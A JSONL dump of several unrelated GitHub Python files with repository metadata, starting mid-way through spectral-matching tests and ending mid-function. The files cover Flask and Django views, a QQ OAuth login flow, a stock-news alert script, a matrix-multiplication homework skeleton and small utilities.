test_match_ftir(mock):\n\tCompareToDatabase(\"ftir\").match()\n\tmock.assert_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_none(mock_xrd, mock_ftir):\n\tCompareToDatabase().match()\n\tmock_xrd.assert_not_called()\n\tmock_ftir.assert_not_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_random(mock_xrd, mock_ftir):\n\tCompareToDatabase(\"random string\").match()\n\tmock_xrd.assert_not_called()\n\tmock_ftir.assert_not_called()\n\ndef test_match_xrd_anilite():\n\t# Entry in database:\n\t# 46.28,100,32.29,65,27.86,57,Anilite,Cu7S4\n\tpeaks = [\n\t\tPeak(None,46.27,100,None),\n\t\tPeak(None,99.22,56,None),\n\t\tPeak(None,10,20,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,111.5845225,30.333,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Anilite\")\n\ndef test_xrd_no_match():\n\t# Entry in database to *not* match:\n\t# 46.28,100,32.29,65,27.86,57,Anilite,Cu7S4\n\tpeaks = [\n\t\tPeak(None,46.28,10,None),\n\t\tPeak(None,99.22,100,None),\n\t\tPeak(None,10,20,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,111.5845225,30.333,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_match_xrd_equal_intensity_peaks():\n\t# Entry in database:\n\t# 164.92,100,29.76,100,155.65,100,Bowieite,\"(Rh,Ir,Pt)1.77S3\"\n\tpeaks = [\n\t\tPeak(None,46.28,10,None),\n\t\tPeak(None,155.65,100,None),\n\t\tPeak(None,29.76,100,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,164.92,100,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Bowieite\")\n\ndef test_match_xrd_barahonaite_al():\n\t# Entry in database:\n\t# 4.01,100,7.92,70,17.79,50,Barahonaite-(Al),\"(Ca,Cu,Na,Fe+++,Al )12Al2(AsO4)8(OH,Cl)x•nH2O\"\n\tpeaks = [\n\t\tPeak(None,17.79,51,None),\n\t\tPeak(None,4.05,100,None),\n\t\tPeak(None,7.92,69,None),\n\t\tPeak(None,32.29,48,None),\n\t\tPeak(None,164.92,22,None),\n\t\tPeak(None,27.86,12,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Barahonaite-(Al)\")\n\ndef test_xrd_no_peaks():\n\tpeaks = []\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_xrd_only_one_peak():\n\tpeaks = [\n\t\tPeak(None,16.99,100,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_xrd_only_2_peaks():\n\tpeaks = [\n\t\tPeak(None,16.99,100,None),\n\t\tPeak(None,6.90,10,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_match_ftir_nitrile_rubber():\n\t# Entry in database:\n\t# nitrile rubber,Primpke et al. 2018,966.3,1435.0,2924.1,1.0,0.9508345,0.37627639\n\tpeaks = [\n\t\tPeak(None,966.3,1.0,None),\n\t\tPeak(None,262.5,0.103,None),\n\t\tPeak(None,1435.0,0.9508345,None),\n\t\tPeak(None,120.6,0.12,None),\n\t\tPeak(None,2914.4,0.25,None),\n\t\tPeak(None,2924.1,0.37627639,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match[\"name\"] == \"nitrile rubber\")\n\ndef test_match_ftir_no_match():\n\t# Entry in database:\n\t# nitrile rubber,Primpke et al. 2018,966.3,1435.0,2924.1,1.0,0.9508345,0.3762763\n\tpeaks = [\n\tPeak(None,3000.1,1.0,None),\n\t\tPeak(None,262.5,0.103,None),\n\t\tPeak(None,2500,0.9508345,None),\n\t\tPeak(None,120.6,0.12,None),\n\t\tPeak(None,2914.4,0.25,None),\n\t\tPeak(None,4000,0.37627639,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_match_ftir_silicone_rubber():\n\t# Entry in database:\n\t# silicone rubber,Primpke et al. 2018,785.0,1006.8,1064.7,1.0,0.8293072,0.4721336\n\tpeaks = [\n\t\tPeak(None,1064.7,0.4721336,None),\n\t\tPeak(None,384.5,0.2821336,None),\n\t\tPeak(None,150.6,0.2569874,None),\n\t\tPeak(None,1006.8,0.8293072,None),\n\t\tPeak(None,785.0,1.0,None),\n\t\tPeak(None,585.4,0.1721336,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match[\"name\"] == \"silicone rubber\")\n\n\ndef test_ftir_no_peaks():\n\tpeaks = []\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_ftir_only_one_peak():\n\tpeaks = [\n\t\tPeak(None,1542.1,1.0,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_ftir_only_2_peaks():\n\tpeaks = [\n\t\tPeak(None,1425.5,1.0,None),\n\t\tPeak(None,1543.8,1.0,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)","repo_name":"AnitaZhang0526/APC_FinalProject","sub_path":"Tests/compare_to_database_test.py","file_name":"compare_to_database_test.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"126945680","text":"import app\nfrom app import login_manager\nfrom flask import current_app, url_for, Blueprint, render_template, redirect, session, abort\nfrom flask_login import login_required, logout_user, login_user, current_user\nfrom flask_principal import Identity, AnonymousIdentity, identity_loaded, RoleNeed, UserNeed, identity_changed\nfrom app.usuarios.models import Usuarios, Cargos\nfrom app.usuarios.forms import UsuarioForm, CargoForm\nfrom app import administrador, atendente, gerente, governanca\n\nusuarios_bp = Blueprint('usuarios_bp', __name__, template_folder='templates', static_folder='static', url_prefix='/usuarios')\ncargos_bp = Blueprint('cargos_bp', __name__, template_folder='templates', static_folder='static', url_prefix='/cargos')\n\n@usuarios_bp.route('/dashboard', methods=['GET',])\ndef usuarios():\n\t\n\tusuarios =\tUsuarios.get()\n\n\treturn render_template('lista_usuarios.html', title=\"Usuários\", usuarios=usuarios,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@usuarios_bp.route('/adicionar', methods=['GET', 'POST'])\n@usuarios_bp.route('/editar/', methods=['GET', 'POST'])\ndef editar_usuarios(id=None):\n\t\n\tform =\tUsuarioForm(id)\n\taviso = None\n\tif form.validate_on_submit():\n\t\tform.salvar()\n\t\tif not form.verificacao_senha:\n\t\t\taviso =\t'Senha e Confirmar senha não coincidem. Por favor tente novamente.'\n\t\t\treturn render_template('editar_usuarios.html', title='Editar usuário', form=form, aviso=aviso,\n\t\t\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\t\t\n\t\treturn redirect( url_for('usuarios_bp.usuarios') )\n\t\n\treturn render_template('editar_usuarios.html', title='Editar usuário', form=form,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@cargos_bp.route('/dashboard', methods=['GET',])\ndef cargos():\n\t\n\tcargos =\tCargos.get()\n\n\treturn render_template('lista_cargos.html', title=\"Usuários\", cargos=cargos,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@cargos_bp.route('/adicionar', methods=['GET', 'POST'])\n@cargos_bp.route('/editar/', methods=['GET', 'POST'])\ndef editar_cargos(id=None):\n\t\n\tform =\tCargoForm(id)\n\t\n\tif form.validate_on_submit():\n\t\tform.salvar()\n\t\treturn redirect( url_for('cargos_bp.cargos') )\n\t\n\treturn render_template('editar_cargos.html', title='Editar usuário', form=form,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n","repo_name":"rrhofs/SGH_ITI","sub_path":"app/usuarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71105533684","text":"import requests\nimport logging\nimport logging.config\nimport sys\nimport os\nimport re\nimport json\nfrom .validator import Validator\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nimport common.vars as variables\nimport store.store_api as store_api\n\n\nclass BookRequesterException(Exception):\n pass\n\n\nclass BookRequester:\n def __init__(self):\n self.logger = logging.getLogger(\"BookRequester\")\n self.logger.info(\"Creating the BookRequester\")\n self.validators = {}\n db = store_api.StoreApi()\n platforms = db.get_platforms()\n for platform in platforms:\n self.validators[platform[\"_id\"]] = Validator(platform)\n\n def request_book(self, book_url, platform=None, force_request=False):\n self.logger.info(\"Requesting a book\")\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}\")\n validator = self.validators.get(platform)\n db = store_api.StoreApi()\n if validator is None:\n self.logger.debug(f\"book_url: {book_url}, validator is None\")\n platforms = [p[\"_id\"] for p in db.get_platforms()]\n if platform is not None:\n self.logger.debug(f\"book_url: {book_url}, platform is not None\")\n if platform not in platforms:\n ex = BookRequesterException(f\"book_url: {book_url}, there is no such platform {platform}\")\n self.logger.exception(ex)\n raise ex\n validator = Validator(platform)\n self.validators[platform] = validator\n else:\n self.logger.debug(f\"book_url: {book_url}, platform is None\")\n for p in platforms:\n regexp = db.get_platform_validation_regexp(p)\n url = re.search(regexp, book_url)\n if url is not None:\n self.logger.debug(f\"book_url: {book_url}, regexp: {regexp}, url: {url.group(0)}\")\n platform = p\n self.logger.debug(f\"book_url: {book_url}, platform {platform} is found\")\n break\n else:\n self.logger.debug(f\"book_url: {book_url}, regexp: {regexp}, url: {url}\")\n\n if platform is None:\n ex = BookRequesterException(f\"There is no platform for book url {book_url}\")\n self.logger.warning(ex)\n raise ex\n validator = self.validators.get(platform)\n if validator is None:\n validator = Validator(platform)\n self.validators[platform] = validator\n else:\n self.logger.debug(f\"book_url: {book_url}, validator is not None\")\n regexp = db.get_platform_validation_regexp(platform)\n url_group = re.search(regexp, book_url)\n\n if url_group is None:\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}, regexp: {regexp}, url: {url_group}\")\n self.logger.debug(f\"book_url: {book_url}, url is None\")\n ex = BookRequesterException(f\"The URL {book_url} is not validated with validation regexp {regexp}\")\n self.logger.exception(ex)\n raise ex\n url = url_group.group(0)\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}, regexp: {regexp}, url: {url}\")\n if not force_request:\n self.logger.info(\"Trying to get the book from DB\")\n book = db.get_book({\"book_url\": url})\n self.logger.debug(f\"book_url: {url}, book: {book}\")\n if book is not None:\n self.logger.info(f\"Returning a book: {book} from DB\")\n return book\n try:\n resp = requests.get(url)\n except requests.exceptions.MissingSchema as ex:\n self.logger.debug(f\"book_url: {book_url}: Missed http schema. Automatically add 'https://' to url and retry.\")\n url = \"https://\" + url\n resp = requests.get(url)\n\n new_book_url = resp.url\n self.logger.debug(f\"book_url: {book_url}, response status: {resp.status_code}, new_book_url: {new_book_url}\")\n\n if not force_request:\n self.logger.info(\"Trying to get the book from DB\")\n book = db.get_book({\"book_url\": new_book_url})\n self.logger.debug(f\"book_url: {new_book_url}, book: {book}\")\n if book is not None:\n self.logger.info(f\"Returning a book: {book} from DB\")\n return book\n\n if validator.validate_book(resp):\n book_info = validator.get_book_info(resp)\n book_info[\"book_url\"] = new_book_url\n book_info[\"platform\"] = platform\n self.logger.debug(f\"book_url: {new_book_url}, book_info: {str(book_info)}\")\n return book_info\n else:\n self.logger.debug(f\"book_url: {new_book_url}, book_info returned from validator is None\")\n return None\n\n\nif __name__ == \"__main__\":\n with open(variables.LOGGING_CONF_FILE_PATH, \"r\") as f:\n conf_dict = json.load(f)\n logging.config.dictConfig(conf_dict)","repo_name":"GoCodingIcreated/newspapper","sub_path":"alert/book_requesters/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12837752585","text":"import requests\nimport os\n\nSTOCK = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\n## STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\nstock_api_params = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": \"TSLA\",\n \"outputsize\": \"compact\",\n \"apikey\": os.environ.get(\"ALPHAVANTAGE_API_KEY\")\n}\n\nstock_api_fetch = requests.get(url=\"https://www.alphavantage.co/query\", params=stock_api_params)\nstock_api_fetch.raise_for_status()\n\nfull_data = stock_api_fetch.json()[\"Time Series (Daily)\"]\nfull_data_list = list(stock_api_fetch.json()[\"Time Series (Daily)\"].items())\n\nyesterday_data = full_data_list[0]\nday_before_yesterday_data = full_data_list[1]\n\nyesterday_price = float(yesterday_data[1][\"4. close\"])\nday_before_yesterday_price = float(day_before_yesterday_data[1][\"4. close\"])\n\n\n## STEP 2: Use https://newsapi.org\n# Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME. \nnewsapi_param = {\n \"qInTitle\": \"TSLA\",\n \"from\": day_before_yesterday_data[0],\n \"sortBy\": \"popularity\",\n \"apiKey\": os.environ.get(\"NEWSAPI_KEY\"),\n \"language\": \"en\",\n}\n\nnewsapi_fetch = requests.get(url=\"https://newsapi.org/v2/everything\", params=newsapi_param)\nnewsapi_fetch.raise_for_status()\nfull_news_data = newsapi_fetch.json()\n\nfull_news_list = list(newsapi_fetch.json().items())\narticles, article_data = full_news_list[2]\n\ntop_3_news = {\n count: {\n \"title\": article[\"title\"],\n \"description\": article[\"description\"],\n }\n for count, article in enumerate(article_data[:3])}\n\ntsla_price_change = (yesterday_price - day_before_yesterday_price) / day_before_yesterday_price\n\nif tsla_price_change >= 0.05:\n print(f\"TSLA: 🔺{round(tsla_price_change*100,2)}%\\n\")\n for i in range(0, 3):\n print(f\"Headline {i+1}: {top_3_news[i]['title']}\")\n print(f\"Brief {i+1}: {top_3_news[i]['description']}\\n\")\n\nif tsla_price_change <= -0.05:\n print(f\"TSLA: 🔻{round(tsla_price_change*100,2)}%\\n\")\n for i in range(0, 3):\n print(f\"Headline {i+1}: {top_3_news[i]['title']}\")\n print(f\"Brief {i+1}: {top_3_news[i]['description']}\\n\")\n","repo_name":"Noitcani/100_Days_of_Python","sub_path":"Day 36 - Stock News Monitoring App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6857207464","text":"'''Given a string, return the dictionary of words and number of occurences'''\nfrom pyproblems.utility import is_str\n\ndef word_count(s_param):\n '''Return a dictionary of words with number of occurences of each word'''\n\n if not is_str(s_param):\n raise TypeError(f\"Unsupported Type {type(s_param)}\")\n\n words = s_param.split()\n word_dict = dict()\n\n for word in words:\n if word in word_dict:\n word_dict[word] += 1\n else:\n word_dict[word] = 1\n\n return word_dict\n ","repo_name":"lnarasim/250_problems","sub_path":"pyproblems/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6428235782","text":"from rest_framework import serializers\nfrom .models import Product, Stock\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n stock = serializers.SerializerMethodField()\n\n def get_stock(self, obj):\n try:\n return Stock.objects.get(product_id=obj.id).quantity\n except:\n return -1\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'price', 'stock')\n\n\nclass StockSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = '__all__'\n","repo_name":"wonderblunders/KreditCart","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1145075710","text":"from datetime import datetime\nfrom django import forms\n\nfrom django.forms import (\n ModelForm,\n CharField,\n TextInput,\n ModelChoiceField,\n ModelMultipleChoiceField,\n)\n\nfrom quotes.models import (\n Tag,\n Author,\n Quote,\n User,\n)\n\n\nclass TagForm(ModelForm):\n name = CharField(min_length=3, max_length=25, required=True, widget=TextInput())\n\n class Meta:\n model = Tag\n fields = ['name']\n\n\nclass QuoteForm(ModelForm):\n author = ModelChoiceField(queryset=Author.objects.none()) # noqa\n tags = ModelMultipleChoiceField(queryset=Tag.objects.none()) # noqa\n\n class Meta:\n model = Quote\n fields = ['quote', 'author', 'tags']\n\n def __init__(self, user: User, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['author'].queryset = Author.objects.filter(user=user) # noqa\n self.fields['tags'].queryset = Tag.objects.all() # noqa\n\n\nclass AuthorForm(ModelForm):\n class Meta:\n model = Author\n fields = ['fullname', 'born_date', 'born_location', 'description']\n \n def clean_born_date(self):\n born_date = self.cleaned_data.get('born_date')\n\n # Check if the birth date is in the future\n if born_date and born_date > datetime.date.today():\n raise forms.ValidationError(\"Дата народження не може бути у майбутньому.\")\n\n return born_date","repo_name":"Derangedwerwolf/HomeWorks","sub_path":"Main_Project/main_project/quotes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16055108324","text":"from random import randint\nfrom multiprocessing import Pool\nimport time\n\n# the single core implementation\ndef matrix_multiplication(m0, m1):\n \"\"\"The following algorithm is exactly how suhak's jungsuk does matrix\n multiplication\"\"\"\n\n # build resulting matrix\n res = [[0 for x in range(len(m0))] for x in range(len(m1))]\n\n # iterate column of lefthand\n for k in range(len(m0[0])):\n # iterate row of lefthand\n for i in range(len(m0)):\n # r = ith row, kth column\n r = m0[i][k]\n for j in range(len(m1)):\n # ith row, jth column of result is summing\n # r * kth row, jth column of righthand\n res[i][j] += (r * m1[k][j])\n return res\n\ndef transposed(m):\n # zip([1,2,3], [3,4,5]) -> [(1,3), (2, 4), (3,5)]\n # just like a zipper, match elements with their corresponding pair\n # equivalent to tranpose, with lengths are equal\n\n # zip(*m) returns the transposed list, but its elements changed to tuples.\n # therefore we change its type to list.\n return [list(r) for r in zip(*m)]\n\ndef f(column):\n # functions used in pool can only accept ONE arguments.\n # Therefore, instead of f(m0, c)\n # we use global a to access the lefthand matrix\n global a\n\n # build resulting column\n result = [0 for x in range(len(a))]\n\n # do a matrix & column multiplication. Two nested for loops will suffice.\n # TODO\n\n return result\n\n#BEGINNING OF CODE EXECUTION\n#BEGINNING OF CODE EXECUTION\n#BEGINNING OF CODE EXECUTION\n\n# size of left, right hand matrices\nSIZE = 300\n\n# change DEBUG to True to print the matrices\n# Print when the SIZE is a small number ( < 4?)\nDEBUG = False\n\n# Generate a SIZExSIZE matrix with random numbers\n# lefthand\na = [[randint(-100,100) for _ in range(SIZE)] for _ in range(SIZE)]\n# righthand\nb = [[randint(-100,100) for _ in range(SIZE)] for _ in range(SIZE)]\n\n\nif DEBUG:\n for (r, r2) in zip(a, b):\n print(r,\" \", r2)\n\n\"\"\"MULTICORE\"\"\"\nstart = time.time()\n# initiate a pool\nwith Pool() as p:\n # transpose the righthand matrix so that we can do column-wise access\n ll = transpose(b)\n\n if DEBUG:\n print(\"RIGHT matrix transposed:\")\n for l in ll:\n print(l)\n\n # apply f to elements in l, using parallelization\n # the result would be list of list(columns).\n # We can transpose it back to match the row-wise representation\n tmp = p.map(f, ll)\n\n # transpose back to get the correct result\n ret = transpose(tmp)\n\n end = time.time()\nprint(\"multicore took: \", end - start)\n\n\"\"\"SINGLECORE\"\"\"\n# get the time before the operation\nstart = time.time()\nresult = matrix_multiplication(a, b)\n# get the time after the operation\nend = time.time()\n# the difference between the two becomes the time spent\nprint(\"singlecore took: \", end - start)\n\nif DEBUG:\n print(\"result of singlecore:\")\n for r in result:\n print(r)\n print(\"result of multicore:\")\n for r in ret:\n print(r)\n\n# check that multicore version works correctly\nassert(result == ret)\n","repo_name":"taehioum/python_tutor","sub_path":"lec04_hw/mat_mul_skeleton.py","file_name":"mat_mul_skeleton.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10375477146","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.response import Response\n\nfrom oauth.utils import generic_access_token\n\n\"\"\"\n1. 获取code\n2. 通过code换取token\n3. 通过token 换取 openid\n\n\"\"\"\n\n\"\"\"\n用户点击 qq 登录按钮的时候,前端应该发送一个 ajax请求,来获取要跳转的url\n这个url 是根据 腾讯的文档来生成的\nGET /oauth/qq/statues/\n\"\"\"\nfrom rest_framework.views import APIView\nfrom QQLoginTool.QQtool import OAuthQQ\nfrom django.conf import settings\n\n# from mall import settings\nclass OauthQQURLView(APIView):\n def get(self,request):\n\n state = '/'\n\n # 1. 创建oauth对象\n # client_id=None, client_secret=None, redirect_uri=None, state=None\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,\n client_secret=settings.QQ_CLIENT_SECRET,\n redirect_uri=settings.QQ_REDIRECT_URI,\n state=state)\n # 2.调用方法,获取url\n login_url = oauth.get_qq_url()\n # login_url = 'https://graph.qq.com/oauth2.0/authorize?response_type=code&redirect_uri=http%3A%2F%2Fwww.meiduo.site%3A8080%2Foauth_callback.html&state=%2F&client_id=101474184'\n\n return Response({'login_url':login_url})\n\n\n\"\"\"\n前段应该 在用户扫描完成之后,跳转到 http://www.meiduo.site:8080/oauth_callback.html?code=6E2E3F64C34ECFE29222EBC390D29196&state=test\n把code 传递给后端,\n\nGET /oauth/qq/users/?code=xxx\n\n# 1.我们获取到这个code, 通过接口来换去 token\n# 2.有了token,就可以换取 oepnid\n\n\"\"\"\nfrom rest_framework import status\nfrom .models import OAuthQQUser\nfrom .serializers import OauthQQUserSerializer\nclass OauthQQUserView(APIView):\n\n def get(self,request):\n code = request.query_params.get('code')\n if code is None:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n # 1.我们获取到这个code, 通过接口来换去 token\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,\n client_secret=settings.QQ_CLIENT_SECRET,\n redirect_uri=settings.QQ_REDIRECT_URI)\n access_token = oauth.get_access_token(code)\n # 2.有了token,就可以换取 oepnid\n openid = oauth.get_open_id(access_token)\n\n # 3. 我们需要根据openid来进行判断\n # 如果数据库中 有openid 则表明用户已经绑定过了\n # 如果数据库中 没有openid 则表明用户没有绑定过,已改显示绑定界面\n\n try:\n qquser = OAuthQQUser.objects.get(openid=openid)\n except OAuthQQUser.DoesNotExist:\n # 说明没有绑定过\n \"\"\"\n 1. 需要对敏感数据进行处理\n 2.数据还需要一个有效期\n \"\"\"\n\n # 我们需要对 openid进行处理\n openid = generic_access_token(openid)\n\n return Response({'access_token':openid})\n\n else:\n # 说明存在, 用户已经绑定过来了,绑定过应该登录\n # 既然是登录,则应该返回token\n # 没有异常 走else\n\n from rest_framework_jwt.settings import api_settings\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(qquser.user)\n token = jwt_encode_handler(payload)\n\n return Response({\n 'user_id':qquser.user.id,\n 'username':qquser.user.username,\n 'token':token,\n })\n\n \"\"\"\n 用户点击绑定按钮的时候,前端应该将 手机号,密码,openid,sms_code 发送给后端\n\n 1. 接收数据\n 2. 对数据进行校验\n 2.1 校验 openid 和sms_code\n 2.2 判断手机���\n 如果注册过,需要判断 密码是否正确\n 如果没有注册过,创建用户\n 3. 保存数据\n 3.1保存 user 和 openid\n 4. 返回响应\n\n POST\n \"\"\"\n\n def post(self, request):\n\n # 1. 接收数据\n data = request.data\n # 2. 对数据进行校验\n # 2.1 校验 openid 和sms_code\n # 2.2 判断手机号\n # 如果注册过,需要判断 密码是否正确\n # 如果没有注册过,创建用户\n serializer = OauthQQUserSerializer(data = data)\n serializer.is_valid(raise_exception=True)\n # 3. 保存数据\n qquser = serializer.save()\n\n # 4. 返回响应\n from rest_framework_jwt.settings import api_settings\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(qquser.user)\n token = jwt_encode_handler(payload)\n\n return Response({\n 'user_id': qquser.user.id,\n 'username': qquser.user.username,\n 'token': token,\n })\n\n\n\n\n\n\n\n\n# 加密签名\n# from itsdangerous import JSONWebSignatureSerializer # 错误的\n\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired\n\nfrom django.conf import settings\n# 1.创建 序列化器\n# secret_key 秘钥,一般使用工程的 SECRET_KEY\n# expires_in=None 有效期 单位秒\nserializer = Serializer(settings.SECRET_KEY, 3600)\n\n# 2. 组织 加密数据\ndata = {'openid': '1234567890'}\n\n# 3.进行加密处理\ntoken = serializer.dumps(data)\n\n\"\"\"\neyJpYXQiOjE1NDE2ODEwNjAsImV4cCI6MTU0MTY4NDY2MCwiYWxnIjoiSFMyNTYifQ.\neyJvcGVuaWQiOiIxMjM0NTY3ODkwIn0.\nmIOKBa9hiOsiHS0sZUqo3hmFXyj2OZrYTt9f6Kk9FCE'\n\n\"\"\"\n# 4.对数据进行解密\nserializer.loads(token)\n\n#5.有效期\nserializer = Serializer(settings.SECRET_KEY,1)\n\n\ndata = {'openid':'1234567890'}\n\ntoken = serializer.dumps(data)\n\n\nserializer.loads(token)\n\n","repo_name":"GODsdgg/Django-","sub_path":"mall/apps/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18033934124","text":"from odoo import api, models\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n @api.multi\n def create_analytic_lines(self):\n new_lines = self.env['account.move.line']\n valid_list = ['Income', 'Expense', 'Cost', 'Revenue']\n for line in self:\n for valid in valid_list:\n if (line.account_id and\n valid in line.account_id.user_type_id.name):\n new_lines += line\n break\n return super(AccountMoveLine, new_lines).create_analytic_lines()\n","repo_name":"ForgeFlow/eficent-odoo-addons","sub_path":"account_analytic_post_by_type/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"76"} +{"seq_id":"70251723767","text":"############################################## graphic/image paths #################################################\nEASY_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/easy_preview.png'\nMEDIUM_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/medium_preview.png'\nDIFFICULT_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/difficult_preview.png'\nPREVIEW_IMAGE_PATHS = [EASY_PREVIEW_IMAGE_PATH, MEDIUM_PREVIEW_IMAGE_PATH, DIFFICULT_PREVIEW_IMAGE_PATH]\n\n################################################# widgets texts ####################################################\nLABEL_TEXT = [\"Va rugam sa selectati dificultatea dorita\", \"Please select the desired difficulty\", \"Por favor eligas la dificultad\"]\nRADIO_BUTTON0_TEXT = [\"Vreau doar sa ma relaxez\", \"Just wanna relax :)\", \"Solo quiero relajar\"]\nRADIO_BUTTON1_TEXT = [\"Dificultate normala\", \"I'll go for normal, thanks!\", \"Normal es bastante por ahora\"]\nRADIO_BUTTON2_TEXT = [\" Doresc o durere de cap...\", \" I'm so looking for a headache...\", \" Quiero que me duela la cabeza...\"]\nHEURISTIC_BUTTON0_TEXT = [\"Euristica Manhattan\", \"Manhattan heuristic\", \"La heuristica Manhattan\"]\nHEURISTIC_BUTTON1_TEXT = [\"Euristica Euclideana\", \"Euclidean heuristic\", \"La heuristica Euclidean\"]\nHEURISTIC_BUTTON2_TEXT = [\"Euristica Chebyshev\", \"Chebyshev heuristic\", \"La heuristica Chebyshev\"]\nHEURISTIC_BUTTON3_TEXT = [\"Euristica Octile\", \"Octile heuristic\", \"La heuristica Octile\"]\nBUTTON_TEXT = [\"Incepeti jocul\", \"Start game\", \"Empieza el juego\"]\n\n###################################################### color #######################################################\nMENU_BACKGROUND_COLOR = '#262624'\nMENU_ACCENT_COLOR = '#ffff00'\n\n###################################################### utils #######################################################\nPREVIEW_DIFFICULTY_IMAGE_RESIZE_FACTOR = 520\n","repo_name":"Lexris/PacmanLabyrinth_python","sub_path":"src/menu/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39079571378","text":"import json\n\ndef serializer(l):\n ret = []\n for row in l:\n ret.append(json.loads(row.serialize()))\n return json.dumps(ret)\n\ndef dictionalizer(l):\n ret = []\n for row in l:\n ret.append(json.loads(row.serialize()))\n return ret\n\n\ndef is_person(daily):\n from gluoncv import data, utils\n import pickle\n import os\n\n try:\n # https://github.com/dmlc/gluon-cv, pretrained 